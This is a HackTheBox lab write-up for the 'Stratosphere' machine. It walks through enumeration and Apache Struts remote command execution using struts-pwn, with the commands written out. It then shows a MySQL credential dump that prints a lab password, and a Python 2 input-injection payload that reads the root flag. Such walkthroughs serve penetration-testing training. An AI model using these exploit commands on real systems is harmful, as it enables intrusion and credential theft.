Introduction
Stratosphere is a machine on the HackTheBox.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
This article will show how to hack Stratosphere box and get user.txt and root.txt.
Collection
First, we scan the Stratosphere box open ports and see if there are some services are weak.
There are 3 ports open. 22 is SSH, 80 is web server. 8080 maybe is Tomcat, Weblogic, or others.
Hack the Stratosphere Box
Hack the Stratosphere box http service
The HTTP server is running on this box, so let’s start on this service first. Open browser, and visit website.
It looks like a correct way. Then, we use dirb to enumerate this web.
But, unluckily, we did not find anything. So, I tried another big dictionary. And See if we can find something.
Finally, we find that there is a sub-folder, which name is “Monitoring“.
Then, we visit this web: http://10.10.10.64/Monitoring/, we can see, it will redirect to http://10.10.10.64/Monitoring/example/Welcome.action
Hack Apache Struts
As you may know, “action” extension is a very special extension. It is Apache Struts extension. And there are lots of vulnerabilities for this application.
We try this payload first. Struts-pwn
Use git clone it, and then run it.
python struts-pwn.py --url http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'id'
We can see the command is ran.
Get User.txt
Then, we need find a way to get user.txt. First, read the /etc/passwd file to identify user name.
We can find that the user name is richard. Then, let’s try to list richard home folder.
There is no permission. Because the current user is “tomcat8”, we should have permission to read web folder and the web files may contain mysql password.
There are some folders and files, we can find sensitive information form these files.
we read “db_connect” file, and get the MySQL Password.
As you may find that, we scan the ports in the beginning, but we did not find that MySQL port (3306) is open. This means that the port is listening the local ip address.(127.0.0.1)
Right now, we have:
- A remote command exec;
- MySQL Password
- MySQL can only be connected on the local ip address.
In my experience, we can use remote command exec to create a bash script to connect to the local MySQL and get sensitive information in the database.
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c '"#!/bin/bash" > /tmp/1.sh' python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c '"mysql -uadmin -padmin -D users<< EOF" >> /tmp/1.sh' python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c '"select * from accounts;" >> /tmp/1.sh' python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c 'EOF" >> /tmp/1.sh'
After we run these commands, it will create a 1.sh file in the tmp folder. And the content is:
Then, we run this script, we will get the following information:
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
Now, we have richard’s password. Login to richard via ssh.
Get Root.txt
Then, we are working on Priv Esc.
First, check the sudo list, and see what can we do by using sudo.
Then, we check that python script.
It looks like about crack password… But, we are Hacker, we do not need to do that.
As you may know, Python 2 has vulnerability, and we can inject code.
We just inject the following code, and then, we will get root.txt
__import__('os').system('cat /root/root.txt')
Summary
This box is not very complicated, everything is there, you just need to know what you need to do. Such as, if you don’t know that is Apache Struts, you probably will stuck. The most time that I spend on is enumeration (Because I am in Australia, the network is not fast to connect to HTB server). The difficulty of this box is around 4/10.
There are other write-ups of HackTheBox.